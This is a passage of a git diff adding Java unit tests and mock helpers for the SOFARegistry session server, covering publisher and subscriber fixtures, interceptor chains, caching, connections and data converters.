+import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.remoting.Connection; +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.ElementType; +import com.alipay.sofa.registry.common.model.PublishSource; +import com.alipay.sofa.registry.common.model.ServerDataBox; +import com.alipay.sofa.registry.common.model.slot.func.SlotFunctionRegistry; +import com.alipay.sofa.registry.common.model.store.*; +import com.alipay.sofa.registry.core.model.BaseRegister; +import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.remoting.bolt.BoltChannel; +import com.alipay.sofa.registry.server.session.bootstrap.CommonConfig; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfigBean; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.collect.Lists; +import io.netty.channel.Channel; +import io.netty.util.Attribute; +import io.netty.util.AttributeKey; +import java.net.InetSocketAddress; +import java.util.List; +import java.util.concurrent.atomic.AtomicBoolean; +import java.util.concurrent.atomic.AtomicLong; +import org.assertj.core.util.Maps; +import org.junit.Assert; +import org.mockito.Mockito; +import org.mockito.invocation.InvocationOnMock; +import org.mockito.stubbing.Answer; + +public class TestUtils { + private static final AtomicLong REGISTER_ID_SEQ = new AtomicLong(); + public static final String GROUP = "testGroup"; + public static final String INSTANCE = "testInstance"; + + private static final AtomicLong CLIENT_VERSION = new AtomicLong(); + + public static final String TEST_DATA_ID = "testDataId"; + public static final String TEST_DATA_INFO_ID; + + private static final String TEST_REGISTER_ID = "testRegisterId"; + + private static final AtomicLong DATA_ID_SEQ = new AtomicLong(); + + static { + Publisher p = createTestPublisher(TEST_DATA_ID); + TEST_DATA_INFO_ID = p.getDataInfoId(); + } + + public static SessionServerConfigBean newSessionConfig(String dataCenter) { + CommonConfig commonConfig = mock(CommonConfig.class); + when(commonConfig.getLocalDataCenter()).thenReturn(dataCenter); + when(commonConfig.getLocalRegion()).thenReturn("DEF_ZONE"); + SessionServerConfigBean configBean = new SessionServerConfigBean(commonConfig); + return configBean; + } + + public static SessionServerConfigBean newSessionConfig(String dataCenter, String region) { + CommonConfig commonConfig = mock(CommonConfig.class); + when(commonConfig.getLocalDataCenter()).thenReturn(dataCenter); + when(commonConfig.getLocalRegion()).thenReturn(region); + SessionServerConfigBean configBean = new SessionServerConfigBean(commonConfig); + return configBean; + } + + public static Publisher createTestPublisher(String dataId) { + Publisher publisher = new Publisher(); + DataInfo dataInfo = DataInfo.valueOf(DataInfo.toDataInfoId(dataId, INSTANCE, GROUP)); + publisher.setDataInfoId(dataInfo.getDataInfoId()); + publisher.setDataId(dataInfo.getDataId()); + publisher.setInstanceId(dataInfo.getInstanceId()); + publisher.setGroup(dataInfo.getGroup()); + publisher.setRegisterId(TEST_REGISTER_ID + REGISTER_ID_SEQ.incrementAndGet()); + publisher.setSessionProcessId(ServerEnv.PROCESS_ID); + publisher.setProcessId("process-" + REGISTER_ID_SEQ.get()); + publisher.setRegisterTimestamp(System.currentTimeMillis()); + publisher.setVersion(100 + CLIENT_VERSION.incrementAndGet()); + ConnectId connectId = + ConnectId.of( + ServerEnv.PROCESS_ID.getHostAddress() + ":9999", + ServerEnv.PROCESS_ID.getHostAddress() + ":9998"); + publisher.setSourceAddress(URL.valueOf(connectId.clientAddress())); + publisher.setTargetAddress(URL.valueOf(connectId.sessionAddress())); + return publisher; + } + + public static List createTestPublishers(int slotId, int count) { + List list = Lists.newArrayListWithCapacity(count); + for (int i = 0; i < Integer.MAX_VALUE; i++) { + Publisher p = + createTestPublisher(TEST_DATA_ID + "-" + DATA_ID_SEQ.incrementAndGet() + "-" + i); + int id = SlotFunctionRegistry.getFunc().slotOf(p.getDataInfoId()); + if (id == slotId) { + // find the slotId + list.add(p); + for (int j = 1; j < count; j++) { + list.add(createTestPublisher(p.getDataId())); + } + break; + } + } + return list; + } + + public static Publisher cloneBase(Publisher publisher) { + Publisher clone = createTestPublisher(publisher.getDataId()); + clone.setRegisterId(publisher.getRegisterId()); + clone.setVersion(publisher.getVersion()); + clone.setRegisterTimestamp(publisher.getRegisterTimestamp()); + clone.setSessionProcessId(publisher.getSessionProcessId()); + return clone; + } + + public static void assertRunException(Class eclazz, RunError runnable) { + try { + runnable.run(); + Assert.fail(); + } catch (Throwable exception) { + if (!eclazz.equals(exception.getClass())) { + exception.printStackTrace(); + Assert.fail(); + } + } + } + + public interface RunError { + void run() throws Exception; + } + + public static MockBlotChannel newChannel(int localPort, String remoteAddress, int remotePort) { + return new MockBlotChannel(localPort, remoteAddress, remotePort); + } + + public static final class MockBlotChannel extends BoltChannel { + final InetSocketAddress remote; + final InetSocketAddress local; + public volatile boolean connected = true; + private final AtomicBoolean active = new AtomicBoolean(true); + + public final Connection conn; + + public MockBlotChannel(int localPort, String remoteAddress, int remotePort) { + super(new Connection(createChn())); + this.conn = getConnection(); + this.local = new InetSocketAddress(ServerEnv.IP, localPort); + this.remote = new InetSocketAddress(remoteAddress, remotePort); + Channel chn = conn.getChannel(); + Mockito.when(chn.remoteAddress()).thenReturn(remote); + Mockito.when(chn.isActive()) + .thenAnswer( + new Answer() { + public Boolean answer(InvocationOnMock var1) throws Throwable { + return active.get(); + } + }); + } + + private static Channel createChn() { + Channel chn = Mockito.mock(io.netty.channel.Channel.class); + Mockito.when(chn.attr(Mockito.any(AttributeKey.class))) + .thenReturn(Mockito.mock(Attribute.class)); + return chn; + } + + @Override + public InetSocketAddress getRemoteAddress() { + return remote; + } + + @Override + public InetSocketAddress getLocalAddress() { + return local; + } + + @Override + public boolean isConnected() { + return active.get(); + } + + public void setActive(boolean b) { + active.set(b); + } + } + + public static void assertBetween(long v, long low, long high) { + Assert.assertTrue(StringFormatter.format("v={}, low={}"), v >= low); + Assert.assertTrue(StringFormatter.format("v={}, high={}"), v <= high); + } + + public static SubPublisher newSubPublisher(long version, long timestamp) { + String registerId = "testRegisterId-" + REGISTER_ID_SEQ.incrementAndGet(); + List dataList = Lists.newArrayList(); + dataList.add(new ServerDataBox("testDataBox")); + SubPublisher publisher = + new SubPublisher( + registerId, + "testCell", + dataList, + "testClient", + version, + "192.168.0.1:8888", + timestamp, + PublishSource.CLIENT); + return publisher; + } + + public static SubDatum newSubDatum(String dataId, long version, List publishers) { + String dataInfo = DataInfo.toDataInfoId(dataId, INSTANCE, GROUP); + SubDatum subDatum = + new SubDatum( + dataInfo, "dataCenter", version, publishers, dataId, "testInstance", "testGroup"); + return subDatum; + } + + public static Subscriber newZoneSubscriber(String cell) { + Subscriber subscriber = new Subscriber(); + subscriber.setRegisterId("test-Subscriber-" + REGISTER_ID_SEQ.incrementAndGet()); + subscriber.setScope(ScopeEnum.zone); + subscriber.setElementType(ElementType.SUBSCRIBER); + subscriber.setClientVersion(BaseInfo.ClientVersion.StoreData); + subscriber.setCell(cell); + subscriber.setGroup(GROUP); + subscriber.setInstanceId(INSTANCE); + subscriber.setSourceAddress(new URL("192.168.1.1", 8888)); + return subscriber; + } + + public static Subscriber newZoneSubscriber(String dataId, String cell) { + Subscriber subscriber = newZoneSubscriber(cell); + subscriber.setDataId(dataId); + String dataInfoId = + DataInfo.toDataInfoId(dataId, subscriber.getInstanceId(), subscriber.getGroup()); + subscriber.setDataInfoId(dataInfoId); + return subscriber; + } + + public static void setField(BaseRegister register) { + register.setAppName("testApp"); + register.setClientId("testClientId"); + register.setDataId("testDataId"); + register.setEventType("testEventType"); + register.setGroup("testGroup"); + register.setInstanceId("testInstanceId"); + String dataInfoId = + DataInfo.toDataInfoId(register.getDataId(), register.getInstanceId(), register.getGroup()); + register.setDataInfoId(dataInfoId); + register.setIp("192.168.1.1"); + register.setPort(8888); + register.setProcessId("testProcessId"); + register.setRegistId("testRegisterId"); + register.setVersion(100L); + register.setTimestamp(System.currentTimeMillis()); + register.setZone("testZone"); + register.setAttributes(Maps.newHashMap("testAttrKey", "testAttrVal")); + } + + public static void assertEquals(BaseRegister left, BaseRegister right) { + Assert.assertEquals(left.getAppName(), right.getAppName()); + Assert.assertEquals(left.getClientId(), right.getClientId()); + Assert.assertEquals(left.getDataId(), right.getDataId()); + Assert.assertEquals(left.getDataInfoId(), right.getDataInfoId()); + Assert.assertEquals(left.getEventType(), right.getEventType()); + Assert.assertEquals(left.getGroup(), right.getGroup()); + Assert.assertEquals(left.getInstanceId(), right.getInstanceId()); + Assert.assertEquals(left.getIp(), right.getIp()); + Assert.assertEquals(left.getPort(), right.getPort()); + Assert.assertEquals(left.getProcessId(), right.getProcessId()); + Assert.assertEquals(left.getRegistId(), right.getRegistId()); + Assert.assertEquals(left.getVersion(), right.getVersion()); + Assert.assertEquals(left.getTimestamp(), right.getTimestamp()); + Assert.assertEquals(left.getZone(), right.getZone()); + Assert.assertEquals(left.getAttributes(), right.getAttributes()); + } + + public static void assertEquals(BaseRegister left, BaseInfo right) { + Assert.assertEquals(left.getAppName(), right.getAppName()); + Assert.assertEquals(left.getClientId(), right.getClientId()); + Assert.assertEquals(left.getDataId(), right.getDataId()); + Assert.assertEquals(left.getDataInfoId(), right.getDataInfoId()); + Assert.assertEquals(left.getGroup(), right.getGroup()); + Assert.assertEquals(left.getInstanceId(), right.getInstanceId()); + Assert.assertEquals(left.getProcessId(), right.getProcessId()); + Assert.assertEquals(left.getRegistId(), right.getRegisterId()); + Assert.assertEquals(left.getVersion().longValue(), right.getVersion()); + Assert.assertEquals(left.getTimestamp().longValue(), right.getClientRegisterTimestamp()); + Assert.assertEquals(left.getZone(), right.getCell()); + Assert.assertEquals(left.getAttributes(), right.getAttributes()); + Assert.assertEquals(left.getIp(), right.getSourceAddress().getIpAddress()); + Assert.assertEquals(left.getPort().intValue(), right.getSourceAddress().getPort()); + Assert.assertEquals(right.getClientVersion(), BaseInfo.ClientVersion.StoreData); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/WrapperInvocationTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/WrapperInvocationTest.java new file mode 100644 index 000000000..16da23e71 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/WrapperInvocationTest.java @@ -0,0 +1,148 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session; + +import static junit.framework.Assert.*; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.session.wrapper.Wrapper; +import com.alipay.sofa.registry.server.session.wrapper.WrapperInterceptor; +import com.alipay.sofa.registry.server.session.wrapper.WrapperInterceptorManager; +import com.alipay.sofa.registry.server.session.wrapper.WrapperInvocation; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.function.Supplier; +import org.junit.Rule; +import org.junit.Test; +import org.junit.rules.ExpectedException; + +/** + * @author shangyu.wh + * @version 1.0: WrapperInvocationTest.java, v 0.1 2019-06-18 17:41 shangyu.wh Exp $ + */ +public class WrapperInvocationTest { + + private Logger logger = LoggerFactory.getLogger(getClass()); + + @Rule public ExpectedException thrown = ExpectedException.none(); + + @Test + public void testWrapperInterceptorException() throws Exception { + thrown.expect(IllegalAccessException.class); + thrown.expectMessage("test exception!"); + testAll("EXP"); + } + + @Test + public void testWrapperInterceptorProceed() throws Exception { + assertEquals(testAll("Proceed"), 1); + } + + @Test + public void testWrapperInterceptorAllRun() throws Exception { + assertEquals(testAll("AllRun"), 2); + } + + private int testAll(String input) throws Exception { + + AtomicInteger ret = new AtomicInteger(0); + + WrapperInterceptorManager wrapperInterceptorManager = new WrapperInterceptorManager(); + + wrapperInterceptorManager.addInterceptor( + new WrapperInterceptor() { + + @Override + public Boolean invokeCodeWrapper(WrapperInvocation invocation) + throws Exception { + logger.info("0"); + if ("EXP".equals(invocation.getParameterSupplier().get())) { + throw new IllegalAccessException("test exception!"); + } + return invocation.proceed(); + } + + @Override + public int getOrder() { + return 0; + } + }); + + wrapperInterceptorManager.addInterceptor( + new WrapperInterceptor() { + + @Override + public Boolean invokeCodeWrapper(WrapperInvocation invocation) + throws Exception { + logger.info("1"); + if ("Proceed".equals(invocation.getParameterSupplier().get())) { + ret.set(1); + return true; + } + return invocation.proceed(); + } + + @Override + public int getOrder() { + return 1; + } + }); + + wrapperInterceptorManager.addInterceptor( + new WrapperInterceptor() { + + @Override + public Boolean invokeCodeWrapper(WrapperInvocation invocation) + throws Exception { + logger.info("2"); + if ("test".equals(invocation.getParameterSupplier().get())) { + return true; + } + return invocation.proceed(); + } + + @Override + public int getOrder() { + return 2; + } + }); + + WrapperInvocation wrapperInvocation = + new WrapperInvocation( + new Wrapper() { + @Override + public Boolean call() { + if ("AllRun".equals(getParameterSupplier().get())) { + System.out.println("success"); + ret.set(2); + return true; + } + return null; + } + + @Override + public Supplier getParameterSupplier() { + return () -> input; + } + }, + wrapperInterceptorManager); + + wrapperInvocation.proceed(); + + return ret.get(); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataProcessorTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataProcessorTest.java new file mode 100644 index 000000000..fae49a486 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataProcessorTest.java @@ -0,0 +1,74 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.acceptor; + +import com.alipay.sofa.registry.common.model.ClientOffPublishers; +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.node.service.DataNodeService; +import com.google.common.collect.Lists; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class WriteDataProcessorTest { + + @Test + public void test() { + DataNodeService dataNodeService = Mockito.mock(DataNodeService.class); + Publisher p = TestUtils.createTestPublisher("testDataId"); + ConnectId connectId = p.connectId(); + WriteDataAcceptorImpl impl = new WriteDataAcceptorImpl(); + impl.dataNodeService = Mockito.mock(DataNodeService.class); + + WriteDataProcessor processor = new WriteDataProcessor(connectId, dataNodeService); + + ClientOffWriteDataRequest off = new ClientOffWriteDataRequest(connectId, Lists.newArrayList(p)); + ClientOffPublishers offPublishers = off.getRequestBody(); + Assert.assertEquals(off.getConnectId(), connectId); + Assert.assertEquals(off.getRequestType(), WriteDataRequest.WriteDataRequestType.CLIENT_OFF); + Assert.assertEquals(offPublishers.getConnectId(), connectId); + Assert.assertEquals(offPublishers.getPublishers().size(), 1); + Assert.assertEquals(offPublishers.getPublishers().get(0), p); + Assert.assertFalse(offPublishers.isEmpty()); + + Assert.assertTrue(processor.process(off)); + impl.accept(off); + Mockito.verify(dataNodeService, Mockito.times(1)).clientOff(offPublishers); + Mockito.verify(impl.dataNodeService, Mockito.times(1)).clientOff(offPublishers); + + PublisherWriteDataRequest pub = + new PublisherWriteDataRequest(p, WriteDataRequest.WriteDataRequestType.PUBLISHER); + Assert.assertEquals(pub.getConnectId(), connectId); + Assert.assertEquals(pub.getRequestType(), WriteDataRequest.WriteDataRequestType.PUBLISHER); + Assert.assertEquals(pub.getConnectId(), connectId); + Assert.assertTrue(processor.process(pub)); + impl.accept(pub); + Mockito.verify(dataNodeService, Mockito.times(1)).register(p); + Mockito.verify(impl.dataNodeService, Mockito.times(1)).register(p); + + pub = new PublisherWriteDataRequest(p, WriteDataRequest.WriteDataRequestType.UN_PUBLISHER); + Assert.assertEquals(pub.getConnectId(), connectId); + Assert.assertEquals(pub.getRequestType(), WriteDataRequest.WriteDataRequestType.UN_PUBLISHER); + Assert.assertEquals(pub.getConnectId(), connectId); + Assert.assertTrue(processor.process(pub)); + impl.accept(pub); + Mockito.verify(dataNodeService, Mockito.times(1)).unregister(p); + Mockito.verify(impl.dataNodeService, Mockito.times(1)).register(p); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/cache/SessionCacheServiceTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/cache/SessionCacheServiceTest.java new file mode 100644 index 000000000..6e0c1d18a --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/cache/SessionCacheServiceTest.java @@ -0,0 +1,85 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.cache; + +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.node.service.DataNodeService; +import java.util.Collections; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class SessionCacheServiceTest { + private final String dataInfoId = "testDataInfoId"; + private final String dataCenter = "testDc"; + + @Test + public void testGet() { + SessionCacheService cacheService = new SessionCacheService(); + cacheService.sessionServerConfig = TestUtils.newSessionConfig(dataCenter); + + DatumCacheGenerator generator = new DatumCacheGenerator(); + cacheService.setCacheGenerators(Collections.singletonMap(DatumKey.class.getName(), generator)); + generator.dataNodeService = Mockito.mock(DataNodeService.class); + + cacheService.init(); + DatumKey datumKey = new DatumKey(dataInfoId, dataCenter); + Key key = new Key(DatumKey.class.getName(), datumKey); + Assert.assertEquals(key, new Key(DatumKey.class.getName(), datumKey)); + Assert.assertTrue(key.toString(), key.toString().contains(dataInfoId)); + Assert.assertEquals(key.getEntityName(), DatumKey.class.getName()); + Assert.assertEquals(key.getEntityType(), datumKey); + Assert.assertEquals(key.getEntityType().hashCode(), datumKey.hashCode()); + + Value value = cacheService.getValueIfPresent(key); + Assert.assertNull(value); + + value = cacheService.getValue(key); + Assert.assertNull(value.getPayload()); + + SubDatum subDatum = + new SubDatum( + dataInfoId, + dataCenter, + 100, + Collections.emptyList(), + "testDataId", + "testInstanceId", + "testGroup"); + + Mockito.when(generator.dataNodeService.fetch(Mockito.anyString(), Mockito.anyString())) + .thenReturn(subDatum); + // invalidate the null value + cacheService.invalidate(key); + value = cacheService.getValue(key); + Assert.assertEquals(value.getPayload(), subDatum); + value = cacheService.getValueIfPresent(key); + Assert.assertEquals(value.getPayload(), subDatum); + cacheService.invalidate(key); + + value = cacheService.getValueIfPresent(key); + Assert.assertNull(value); + + // touch remove listener + for (int i = 0; i < cacheService.sessionServerConfig.getCacheDatumMaxNums() * 2; i++) { + datumKey = new DatumKey(dataInfoId + ":" + i, dataCenter); + key = new Key(DatumKey.class.getName(), datumKey); + cacheService.getValue(key); + } + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/connections/ConnectionsServiceTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/connections/ConnectionsServiceTest.java new file mode 100644 index 000000000..4b6976053 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/connections/ConnectionsServiceTest.java @@ -0,0 +1,71 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.connections; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfigBean; +import com.alipay.sofa.registry.server.session.mapper.ConnectionMapper; +import com.alipay.sofa.registry.server.session.store.DataStore; +import com.alipay.sofa.registry.server.session.store.SessionInterests; +import com.alipay.sofa.registry.server.session.store.SessionWatchers; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.util.List; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class ConnectionsServiceTest { + @Test + public void test() { + SessionServerConfigBean configBean = TestUtils.newSessionConfig("testDc"); + ConnectionsService connectionsService = new ConnectionsService(); + connectionsService.sessionServerConfig = configBean; + connectionsService.connectionMapper = new ConnectionMapper(); + connectionsService.sessionDataStore = Mockito.mock(DataStore.class); + + connectionsService.sessionInterests = new SessionInterests(); + connectionsService.sessionWatchers = new SessionWatchers(); + + connectionsService.boltExchange = Mockito.mock(Exchange.class); + String remoteIp = "192.168.8.8"; + Assert.assertEquals(connectionsService.getIpConnects(Lists.newArrayList(remoteIp)).size(), 0); + Assert.assertEquals(connectionsService.closeIpConnects(Lists.newArrayList(remoteIp)).size(), 0); + + Server server = Mockito.mock(Server.class); + Mockito.when(connectionsService.boltExchange.getServer(Mockito.anyInt())).thenReturn(server); + + TestUtils.MockBlotChannel channel = TestUtils.newChannel(9600, remoteIp, 1234); + Mockito.when(server.getChannels()).thenReturn(Lists.newArrayList(channel)); + ConnectId connectId = ConnectId.of(channel.getRemoteAddress(), channel.getLocalAddress()); + Mockito.when(connectionsService.sessionDataStore.getConnectIds()) + .thenReturn(Sets.newHashSet(connectId)); + + List list = connectionsService.getConnections(); + Assert.assertEquals(list, Lists.newArrayList(remoteIp + ":1234")); + + List connectIds = connectionsService.getIpConnects(Lists.newArrayList("222")); + Assert.assertEquals(connectIds.size(), 0); + + connectIds = connectionsService.getIpConnects(Lists.newArrayList(remoteIp)); + Assert.assertEquals(connectIds.size(), 1); + Assert.assertEquals(connectIds.get(0), connectId); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/PublisherConverterTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/PublisherConverterTest.java new file mode 100644 index 000000000..a149c4e4d --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/PublisherConverterTest.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter; + +import com.alipay.sofa.registry.common.model.PublishSource; +import com.alipay.sofa.registry.common.model.PublishType; +import com.alipay.sofa.registry.common.model.ServerDataBox; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.core.model.DataBox; +import com.alipay.sofa.registry.core.model.PublisherRegister; +import com.alipay.sofa.registry.server.session.TestUtils; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Test; + +public class PublisherConverterTest { + + @Test + public void test() throws Exception { + PublisherRegister register = new PublisherRegister(); + TestUtils.setField(register); + register.setDataList(Lists.newArrayList(new DataBox("testDataBox"))); + long now1 = System.currentTimeMillis(); + Publisher publisher = PublisherConverter.convert(register); + long now2 = System.currentTimeMillis(); + TestUtils.assertBetween(publisher.getRegisterTimestamp(), now1, now2); + TestUtils.assertEquals(register, publisher); + + Assert.assertEquals(PublishType.NORMAL, publisher.getPublishType()); + Assert.assertEquals(PublishSource.CLIENT, publisher.getPublishSource()); + + Assert.assertEquals(register.getDataList().size(), publisher.getDataList().size()); + Assert.assertEquals(register.getDataList().size(), 1); + ServerDataBox box = publisher.getDataList().get(0); + box.extract(); + Assert.assertEquals(box.getObject(), "testDataBox"); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/ReceivedDataConverterTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/ReceivedDataConverterTest.java new file mode 100644 index 000000000..93dea241a --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/ReceivedDataConverterTest.java @@ -0,0 +1,97 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter; + +import com.alipay.sofa.registry.common.model.ServerDataBox; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.common.model.store.SubPublisher; +import com.alipay.sofa.registry.core.model.DataBox; +import com.alipay.sofa.registry.core.model.ReceivedConfigData; +import com.alipay.sofa.registry.core.model.ReceivedData; +import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfigBean; +import com.alipay.sofa.registry.server.session.predicate.ZonePredicate; +import java.util.Collections; +import java.util.List; +import org.junit.Assert; +import org.junit.Test; + +public class ReceivedDataConverterTest { + private final String dataId = "testDataId"; + private final String localZone = "testLocalZone"; + private final SubPublisher subPublisher = + TestUtils.newSubPublisher(1, System.currentTimeMillis()); + + @Test + public void testGetReceivedDataMulti() throws Exception { + Assert.assertNull( + ReceivedDataConverter.getReceivedDataMulti( + null, ScopeEnum.zone, Collections.emptyList(), null, null)); + SubDatum subDatum = TestUtils.newSubDatum(dataId, 100, Collections.emptyList()); + List subIds = Collections.singletonList("testSubId"); + ReceivedData data = + ReceivedDataConverter.getReceivedDataMulti( + subDatum, ScopeEnum.dataCenter, subIds, localZone, null); + + assertReceivedData(data, subDatum, subIds, localZone); + Assert.assertEquals(data.getData().size(), 0); + + SessionServerConfigBean configBean = TestUtils.newSessionConfig("testDc"); + subDatum = TestUtils.newSubDatum(dataId, 100, Collections.singletonList(subPublisher)); + data = + ReceivedDataConverter.getReceivedDataMulti( + subDatum, + ScopeEnum.dataCenter, + subIds, + localZone, + ZonePredicate.zonePredicate( + subDatum.getDataId(), localZone, ScopeEnum.dataCenter, configBean)); + + assertReceivedData(data, subDatum, subIds, localZone); + Assert.assertEquals(data.getData().size(), 1); + List dataBoxes = data.getData().get(subPublisher.getCell()); + Assert.assertEquals(dataBoxes.size(), 1); + Assert.assertEquals(dataBoxes.get(0).getData(), subPublisher.getDataList().get(0).extract()); + } + + @Test + public void testGetReceivedConfigData() throws Exception { + ServerDataBox dataBox = new ServerDataBox("testDataBox"); + SubDatum subDatum = TestUtils.newSubDatum(dataId, 10, Collections.emptyList()); + DataInfo dataInfo = DataInfo.valueOf(subDatum.getDataInfoId()); + ReceivedConfigData data = ReceivedDataConverter.getReceivedConfigData(dataBox, dataInfo, 100L); + Assert.assertEquals(data.getDataId(), dataInfo.getDataId()); + Assert.assertEquals(data.getGroup(), dataInfo.getGroup()); + Assert.assertEquals(data.getInstanceId(), dataInfo.getInstanceId()); + Assert.assertEquals(data.getVersion().longValue(), 100); + Assert.assertEquals(data.getDataBox().getData(), dataBox.extract()); + } + + private void assertReceivedData( + ReceivedData data, SubDatum subDatum, List subIds, String localZone) { + Assert.assertEquals(data.getDataId(), subDatum.getDataId()); + Assert.assertEquals(data.getGroup(), subDatum.getGroup()); + Assert.assertEquals(data.getInstanceId(), subDatum.getInstanceId()); + Assert.assertEquals(data.getSubscriberRegistIds(), subIds); + Assert.assertEquals(data.getSegment(), subDatum.getDataCenter()); + Assert.assertEquals(data.getScope(), ScopeEnum.dataCenter.name()); + Assert.assertEquals(data.getVersion().longValue(), subDatum.getVersion()); + Assert.assertEquals(data.getLocalZone(), localZone); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/SubscriberConverterTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/SubscriberConverterTest.java new file mode 100644 index 000000000..ed38dcbb2 